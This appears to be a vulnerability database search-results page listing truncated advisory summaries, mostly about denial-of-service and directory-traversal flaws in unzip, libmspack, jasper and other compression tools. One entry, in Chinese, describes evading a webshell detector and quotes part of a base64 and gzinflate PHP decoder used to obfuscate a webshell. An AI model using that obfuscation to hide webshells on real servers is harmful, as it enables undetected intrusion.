3660 matches found
ALPINE-CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
Out-of-bounds
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
Libmspack CHM Decompression Divide by Zero Denial of Service Vulnerability
Libmspack is a library of related Microsoft compression formats such as CAB, CHM, HLP, LIT, KWAJ and SZDD. Libmspack's handling of specially crafted CHM files suffers from a divide-by-zero denial-of-service vulnerability, which can be exploited by remote attackers to crash an application...
Updated cabextract packages fix CVE-2014-9556
Updated cabextract packages fix security vulnerability: Libmspack, a library to provide compression and decompression of some file formats used by Microsoft, is embedded in cabextract. A specially crafted cab file can cause cabextract to hang forever. If cabextract is exposed to any...
Libmspack Null Pointer Reference Denial of Service Vulnerability
Libmspack is a library of related Microsoft compression formats such as CAB, CHM, HLP, LIT, KWAJ and SZDD. Libmspack handles specially crafted CAB files with a null pointer reference denial of service vulnerability that allows attackers to exploit the vulnerability to crash applications...
Analysis of Flash Zero Day Shows Layers of Obfuscation
The Flash zero day that made its way into the Angler exploit kit was wrapped in multiple layers of obfuscation and has the ability to inject its malicious payload straight into users’ browsers. In the last week, since the news broke of the Adobe Flash zero-day flaw appearing in the Angler kit,...
jasper security update
CentOS Errata and Security Advisory CESA-2015:0074 Updated jasper packages that fix two security issues are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System CVSS base scores,...
kgb directory traversal vulnerability
KGB is a free compression tool with high compression ratio. A directory traversal vulnerability exists in kgb, which can be exploited by a remote attacker to overwrite arbitrary files under the application using a specially crafted request with a directory traversal sequence '... /' to overwrite...
Multiple directory traversal vulnerability in ha
ha is a set of compression software using the HSC compression algorithm developed by software developer Mikhail Gusarov. A multiple directory traversal vulnerability exists in ha, which could be exploited by a remote attacker to read arbitrary files within the context of the application...
[SECURITY] Fedora 21 Update: jasper-1.900.1-29.fc21
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
[SECURITY] Fedora 19 Update: jasper-1.900.1-26.fc19
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
[SECURITY] Fedora 20 Update: jasper-1.900.1-27.fc20
This package contains an implementation of the image compression standard JPEG-2000, Part 1. It consists of tools for conversion to and from the JP2 and JPC formats...
云锁最新版1.3.145绕过webshell检测
简要描述: webshell检测绕过 详细说明: 一句话马+大马绕过检测 漏洞证明: 1.一句话木马,单纯用这种方式肯定会被检测到,我们采用这种方式: 结果发现只有一开始说的那种文件被检测到: 2.大马,采用base64+gzinflate压缩编码,大马文件如下: ?php function CLsI$ZzvSWE $ZzvSWE=gzinflatebase64decode$ZzvSWE; for$i=0;$istrlen$ZzvSWE;$i++ $ZzvSWE$i = chrord$ZzvSWE$i-1; return $ZzvSWE;...
[SECURITY] Fedora 19 Update: openjpeg-1.5.1-13.fc19
OpenJPEG is an open-source JPEG 2000 codec written in C. It has been developed in order to promote the use of JPEG 2000, the new still-image compression standard from the Joint Photographic Experts Group JPEG...
CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
UBUNTU-CVE-2014-9636
unzip 6.0 allows remote attackers to cause a denial of service out-of-bounds read or write and crash via an extra field with an uncompressed size smaller than the compressed field size in a zip archive that advertises STORED method compression...
DNS Label Compression Recursion Denial of Service - Ver2 (CVE-2007-1030)
A denial-of-service vulnerability has been reported in Niels Provos Libevent. Successful exploitation of this vulnerability would allow a remote attacker to create a denial of service condition on the affected system...
[SECURITY] Fedora 21 Update: flac-1.3.1-1.fc21
FLAC stands for Free Lossless Audio Codec. Grossly oversimplified, FLAC is similar to Ogg Vorbis, but lossless. The FLAC project consists of the stream format, reference encoders and decoders in library form, flac, a command-line program to encode and decode FLAC files, metaflac, a command-line...